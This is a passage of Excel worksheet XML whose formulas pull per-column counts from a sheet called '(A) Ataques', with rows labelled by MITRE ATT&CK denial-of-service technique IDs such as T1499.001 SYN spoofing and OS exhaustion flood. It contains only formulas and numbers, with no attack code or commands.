        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($P73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BT73,"")</f>
        <v>19</v>
      </c>
      <c r="V73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BV73,"")</f>
        <v>6</v>
      </c>
      <c r="W73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BX73,"")</f>
        <v>5</v>
      </c>
      <c r="X73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BY73,"")</f>
        <v>2</v>
      </c>
      <c r="Y73" s="532">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($U73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z73" s="288">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!BZ73,"")</f>
        <v>4</v>
      </c>
      <c r="AA73" s="392">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!CB73,"")</f>
        <v>2</v>
      </c>
      <c r="AB73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!CD73,"")</f>
        <v>2</v>
      </c>
      <c r="AC73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!CE73,"")</f>
        <v>1</v>
      </c>
      <c r="AD73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF(Z73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CF73,"")</f>
        <v>23</v>
      </c>
      <c r="AF73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CH73,"")</f>
        <v>8</v>
      </c>
      <c r="AG73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CJ73,"")</f>
        <v>7</v>
      </c>
      <c r="AH73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CK73,"")</f>
        <v>2</v>
      </c>
      <c r="AI73" s="287">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($AE73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ73" s="292">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CL73,"")</f>
        <v>0</v>
      </c>
      <c r="AK73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CN73,"")</f>
        <v>0</v>
      </c>
      <c r="AL73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CP73,"")</f>
        <v>0</v>
      </c>
      <c r="AM73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CQ73,"")</f>
        <v>0</v>
      </c>
      <c r="AN73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($AJ73=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CR73,"")</f>
        <v>1</v>
      </c>
      <c r="AP73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CT73,"")</f>
        <v>1</v>
      </c>
      <c r="AQ73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CV73,"")</f>
        <v>1</v>
      </c>
      <c r="AR73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$CW73,"")</f>
        <v>1</v>
      </c>
      <c r="AS73" s="287">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($AO73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT73" s="288">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!CX73,"")</f>
        <v>19</v>
      </c>
      <c r="AU73" s="392">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!CZ73,"")</f>
        <v>6</v>
      </c>
      <c r="AV73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!DB73,"")</f>
        <v>5</v>
      </c>
      <c r="AW73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!DC73,"")</f>
        <v>2</v>
      </c>
      <c r="AX73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($AT73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY73" s="469">
        <f>'(A) Ataques'!LU73+'(A) Ataques'!MA73+'(A) Ataques'!MG73+'(A) Ataques'!MM73+'(A) Ataques'!MS73</f>
        <v>9</v>
      </c>
      <c r="AZ73" s="510">
        <f>'(A) Ataques'!LW73+'(A) Ataques'!MC73+'(A) Ataques'!MI73+'(A) Ataques'!MO73+'(A) Ataques'!MU73</f>
        <v>5</v>
      </c>
      <c r="BA73" s="471">
        <f>'(A) Ataques'!LY73+'(A) Ataques'!ME73+'(A) Ataques'!MK73+'(A) Ataques'!MQ73+'(A) Ataques'!MW73</f>
        <v>3</v>
      </c>
      <c r="BB73" s="471">
        <f>'(A) Ataques'!LQ73</f>
        <v>4</v>
      </c>
      <c r="BC73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($AY73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD73" s="469">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!LL73,"")</f>
        <v>14</v>
      </c>
      <c r="BE73" s="510">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!LM73,"")</f>
        <v>8</v>
      </c>
      <c r="BF73" s="471">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!LN73,"")</f>
        <v>3</v>
      </c>
      <c r="BG73" s="471">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!LO73,"")</f>
        <v>1</v>
      </c>
      <c r="BH73" s="471">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!LS73,"")</f>
        <v>4</v>
      </c>
      <c r="BI73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($BD73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ73" s="469">
        <f>'(A) Ataques'!OL73+'(A) Ataques'!OR73+'(A) Ataques'!OX73+'(A) Ataques'!PD73+'(A) Ataques'!PJ73</f>
        <v>1</v>
      </c>
      <c r="BK73" s="510">
        <f>'(A) Ataques'!ON73+'(A) Ataques'!OT73+'(A) Ataques'!OZ73+'(A) Ataques'!PF73+'(A) Ataques'!PL73</f>
        <v>1</v>
      </c>
      <c r="BL73" s="471">
        <f>'(A) Ataques'!OP73+'(A) Ataques'!OV73+'(A) Ataques'!PB73+'(A) Ataques'!PH73+'(A) Ataques'!PN73</f>
        <v>1</v>
      </c>
      <c r="BM73" s="495">
        <f>'(A) Ataques'!OH73</f>
        <v>1</v>
      </c>
      <c r="BN73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($BJ73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO73" s="469">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!OC73,"")</f>
        <v>1</v>
      </c>
      <c r="BP73" s="510">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!OD73,"")</f>
        <v>1</v>
      </c>
      <c r="BQ73" s="471">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!OE73,"")</f>
        <v>1</v>
      </c>
      <c r="BR73" s="471">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!OF73,"")</f>
        <v>1</v>
      </c>
      <c r="BS73" s="471">
        <f>IF('(A) Ataques'!$AP73&lt;&gt;"NO",'(A) Ataques'!OJ73,"")</f>
        <v>1</v>
      </c>
      <c r="BT73" s="331">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($BO73=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A74" s="79">
        <f t="shared" si="1"/>
        <v>72</v>
      </c>
      <c r="B74" s="4">
        <f>IF('(A) Ataques'!AK74&lt;&gt;"NO",'(A) Ataques'!E74,"")</f>
        <v>48</v>
      </c>
      <c r="C74" s="6" t="str">
        <f>IF('(A) Ataques'!AK74&lt;&gt;"NO",IF('(A) Ataques'!M74="","",'(A) Ataques'!M74),"")</f>
        <v>T1499.001-Syn_suplantacion</v>
      </c>
      <c r="D74" s="4" t="str">
        <f>IF('(A) Ataques'!AK74&lt;&gt;"NO",'(A) Ataques'!F74,"")</f>
        <v>T1499</v>
      </c>
      <c r="E74" s="286">
        <f>IF('(A) Ataques'!AK74&lt;&gt;"NO",'(A) Ataques'!AQ74,"")</f>
        <v>2333</v>
      </c>
      <c r="F74" s="288">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!BB74,"")</f>
        <v>0</v>
      </c>
      <c r="G74" s="392">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!BD74,"")</f>
        <v>0</v>
      </c>
      <c r="H74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!BF74,"")</f>
        <v>0</v>
      </c>
      <c r="I74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!BG74,"")</f>
        <v>0</v>
      </c>
      <c r="J74" s="530">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($F74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BH74,"")</f>
        <v>0</v>
      </c>
      <c r="L74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BJ74,"")</f>
        <v>0</v>
      </c>
      <c r="M74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BL74,"")</f>
        <v>0</v>
      </c>
      <c r="N74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BM74,"")</f>
        <v>0</v>
      </c>
      <c r="O74" s="532">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($K74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P74" s="292">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BN74,"")</f>
        <v>0</v>
      </c>
      <c r="Q74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BP74,"")</f>
        <v>0</v>
      </c>
      <c r="R74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BR74,"")</f>
        <v>0</v>
      </c>
      <c r="S74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BS74,"")</f>
        <v>0</v>
      </c>
      <c r="T74" s="530">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($P74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BT74,"")</f>
        <v>0</v>
      </c>
      <c r="V74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BV74,"")</f>
        <v>0</v>
      </c>
      <c r="W74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BX74,"")</f>
        <v>0</v>
      </c>
      <c r="X74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$BY74,"")</f>
        <v>0</v>
      </c>
      <c r="Y74" s="532">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($U74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="Z74" s="288">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!BZ74,"")</f>
        <v>12</v>
      </c>
      <c r="AA74" s="392">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!CB74,"")</f>
        <v>10</v>
      </c>
      <c r="AB74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!CD74,"")</f>
        <v>2</v>
      </c>
      <c r="AC74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!CE74,"")</f>
        <v>5</v>
      </c>
      <c r="AD74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF(Z74=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CF74,"")</f>
        <v>12</v>
      </c>
      <c r="AF74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CH74,"")</f>
        <v>10</v>
      </c>
      <c r="AG74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CJ74,"")</f>
        <v>2</v>
      </c>
      <c r="AH74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CK74,"")</f>
        <v>5</v>
      </c>
      <c r="AI74" s="287">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($AE74=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ74" s="292">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CL74,"")</f>
        <v>0</v>
      </c>
      <c r="AK74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CN74,"")</f>
        <v>0</v>
      </c>
      <c r="AL74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CP74,"")</f>
        <v>0</v>
      </c>
      <c r="AM74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CQ74,"")</f>
        <v>0</v>
      </c>
      <c r="AN74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($AJ74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CR74,"")</f>
        <v>0</v>
      </c>
      <c r="AP74" s="322">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CT74,"")</f>
        <v>0</v>
      </c>
      <c r="AQ74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CV74,"")</f>
        <v>0</v>
      </c>
      <c r="AR74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!$CW74,"")</f>
        <v>0</v>
      </c>
      <c r="AS74" s="287">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($AO74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT74" s="288">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!CX74,"")</f>
        <v>0</v>
      </c>
      <c r="AU74" s="392">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!CZ74,"")</f>
        <v>0</v>
      </c>
      <c r="AV74" s="4">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!DB74,"")</f>
        <v>0</v>
      </c>
      <c r="AW74" s="20">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",'(A) Ataques'!DC74,"")</f>
        <v>0</v>
      </c>
      <c r="AX74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($AT74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY74" s="469">
        <f>'(A) Ataques'!LU74+'(A) Ataques'!MA74+'(A) Ataques'!MG74+'(A) Ataques'!MM74+'(A) Ataques'!MS74</f>
        <v>0</v>
      </c>
      <c r="AZ74" s="510">
        <f>'(A) Ataques'!LW74+'(A) Ataques'!MC74+'(A) Ataques'!MI74+'(A) Ataques'!MO74+'(A) Ataques'!MU74</f>
        <v>0</v>
      </c>
      <c r="BA74" s="471">
        <f>'(A) Ataques'!LY74+'(A) Ataques'!ME74+'(A) Ataques'!MK74+'(A) Ataques'!MQ74+'(A) Ataques'!MW74</f>
        <v>0</v>
      </c>
      <c r="BB74" s="471">
        <f>'(A) Ataques'!LQ74</f>
        <v>0</v>
      </c>
      <c r="BC74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($AY74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD74" s="469">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!LL74,"")</f>
        <v>0</v>
      </c>
      <c r="BE74" s="510">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!LM74,"")</f>
        <v>0</v>
      </c>
      <c r="BF74" s="471">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!LN74,"")</f>
        <v>0</v>
      </c>
      <c r="BG74" s="471">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!LO74,"")</f>
        <v>0</v>
      </c>
      <c r="BH74" s="471">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!LS74,"")</f>
        <v>0</v>
      </c>
      <c r="BI74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($BD74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BJ74" s="469">
        <f>'(A) Ataques'!OL74+'(A) Ataques'!OR74+'(A) Ataques'!OX74+'(A) Ataques'!PD74+'(A) Ataques'!PJ74</f>
        <v>0</v>
      </c>
      <c r="BK74" s="510">
        <f>'(A) Ataques'!ON74+'(A) Ataques'!OT74+'(A) Ataques'!OZ74+'(A) Ataques'!PF74+'(A) Ataques'!PL74</f>
        <v>0</v>
      </c>
      <c r="BL74" s="471">
        <f>'(A) Ataques'!OP74+'(A) Ataques'!OV74+'(A) Ataques'!PB74+'(A) Ataques'!PH74+'(A) Ataques'!PN74</f>
        <v>0</v>
      </c>
      <c r="BM74" s="495">
        <f>'(A) Ataques'!OH74</f>
        <v>0</v>
      </c>
      <c r="BN74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($BJ74=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO74" s="469">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!OC74,"")</f>
        <v>0</v>
      </c>
      <c r="BP74" s="510">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!OD74,"")</f>
        <v>0</v>
      </c>
      <c r="BQ74" s="471">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!OE74,"")</f>
        <v>0</v>
      </c>
      <c r="BR74" s="471">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!OF74,"")</f>
        <v>0</v>
      </c>
      <c r="BS74" s="471">
        <f>IF('(A) Ataques'!$AP74&lt;&gt;"NO",'(A) Ataques'!OJ74,"")</f>
        <v>0</v>
      </c>
      <c r="BT74" s="331">
        <f>IF('(A) Ataques'!$AK74&lt;&gt;"NO",IF($BO74=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A75" s="79">
        <f t="shared" si="1"/>
        <v>73</v>
      </c>
      <c r="B75" s="4">
        <f>IF('(A) Ataques'!AK75&lt;&gt;"NO",'(A) Ataques'!E75,"")</f>
        <v>48</v>
      </c>
      <c r="C75" s="6" t="str">
        <f>IF('(A) Ataques'!AK75&lt;&gt;"NO",IF('(A) Ataques'!M75="","",'(A) Ataques'!M75),"")</f>
        <v>T1499.001-OS_Exhaustion_Flood</v>
      </c>
      <c r="D75" s="4" t="str">
        <f>IF('(A) Ataques'!AK75&lt;&gt;"NO",'(A) Ataques'!F75,"")</f>
        <v>T1499</v>
      </c>
      <c r="E75" s="286">
        <f>IF('(A) Ataques'!AK75&lt;&gt;"NO",'(A) Ataques'!AQ75,"")</f>
        <v>340</v>
      </c>
      <c r="F75" s="288">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!BB75,"")</f>
        <v>213</v>
      </c>
      <c r="G75" s="392">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!BD75,"")</f>
        <v>213</v>
      </c>
      <c r="H75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!BF75,"")</f>
        <v>2</v>
      </c>
      <c r="I75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!BG75,"")</f>
        <v>180</v>
      </c>
      <c r="J75" s="530">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($F75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BH75,"")</f>
        <v>1</v>
      </c>
      <c r="L75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BJ75,"")</f>
        <v>1</v>
      </c>
      <c r="M75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BL75,"")</f>
        <v>1</v>
      </c>
      <c r="N75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BM75,"")</f>
        <v>1</v>
      </c>
      <c r="O75" s="532">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($K75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P75" s="292">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BN75,"")</f>
        <v>214</v>
      </c>
      <c r="Q75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BP75,"")</f>
        <v>214</v>
      </c>
      <c r="R75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BR75,"")</f>
        <v>3</v>
      </c>
      <c r="S75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BS75,"")</f>
        <v>180</v>
      </c>
      <c r="T75" s="530">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($P75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BT75,"")</f>
        <v>305</v>
      </c>
      <c r="V75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BV75,"")</f>
        <v>259</v>
      </c>
      <c r="W75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BX75,"")</f>
        <v>3</v>
      </c>
      <c r="X75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$BY75,"")</f>
        <v>180</v>
      </c>
      <c r="Y75" s="532">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($U75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z75" s="288">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!BZ75,"")</f>
        <v>9</v>
      </c>
      <c r="AA75" s="392">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!CB75,"")</f>
        <v>7</v>
      </c>
      <c r="AB75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!CD75,"")</f>
        <v>3</v>
      </c>
      <c r="AC75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!CE75,"")</f>
        <v>4</v>
      </c>
      <c r="AD75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF(Z75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CF75,"")</f>
        <v>314</v>
      </c>
      <c r="AF75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CH75,"")</f>
        <v>266</v>
      </c>
      <c r="AG75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CJ75,"")</f>
        <v>6</v>
      </c>
      <c r="AH75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CK75,"")</f>
        <v>182</v>
      </c>
      <c r="AI75" s="287">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($AE75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ75" s="292">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CL75,"")</f>
        <v>0</v>
      </c>
      <c r="AK75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CN75,"")</f>
        <v>0</v>
      </c>
      <c r="AL75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CP75,"")</f>
        <v>0</v>
      </c>
      <c r="AM75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CQ75,"")</f>
        <v>0</v>
      </c>
      <c r="AN75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($AJ75=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CR75,"")</f>
        <v>92</v>
      </c>
      <c r="AP75" s="322">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CT75,"")</f>
        <v>46</v>
      </c>
      <c r="AQ75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CV75,"")</f>
        <v>1</v>
      </c>
      <c r="AR75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!$CW75,"")</f>
        <v>46</v>
      </c>
      <c r="AS75" s="287">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($AO75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT75" s="288">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!CX75,"")</f>
        <v>306</v>
      </c>
      <c r="AU75" s="392">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!CZ75,"")</f>
        <v>260</v>
      </c>
      <c r="AV75" s="4">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!DB75,"")</f>
        <v>4</v>
      </c>
      <c r="AW75" s="20">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",'(A) Ataques'!DC75,"")</f>
        <v>180</v>
      </c>
      <c r="AX75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($AT75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY75" s="469">
        <f>'(A) Ataques'!LU75+'(A) Ataques'!MA75+'(A) Ataques'!MG75+'(A) Ataques'!MM75+'(A) Ataques'!MS75</f>
        <v>0</v>
      </c>
      <c r="AZ75" s="510">
        <f>'(A) Ataques'!LW75+'(A) Ataques'!MC75+'(A) Ataques'!MI75+'(A) Ataques'!MO75+'(A) Ataques'!MU75</f>
        <v>0</v>
      </c>
      <c r="BA75" s="471">
        <f>'(A) Ataques'!LY75+'(A) Ataques'!ME75+'(A) Ataques'!MK75+'(A) Ataques'!MQ75+'(A) Ataques'!MW75</f>
        <v>0</v>
      </c>
      <c r="BB75" s="471">
        <f>'(A) Ataques'!LQ75</f>
        <v>0</v>
      </c>
      <c r="BC75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($AY75=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD75" s="469">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!LL75,"")</f>
        <v>588</v>
      </c>
      <c r="BE75" s="510">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!LM75,"")</f>
        <v>588</v>
      </c>
      <c r="BF75" s="471">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!LN75,"")</f>
        <v>0</v>
      </c>
      <c r="BG75" s="471">
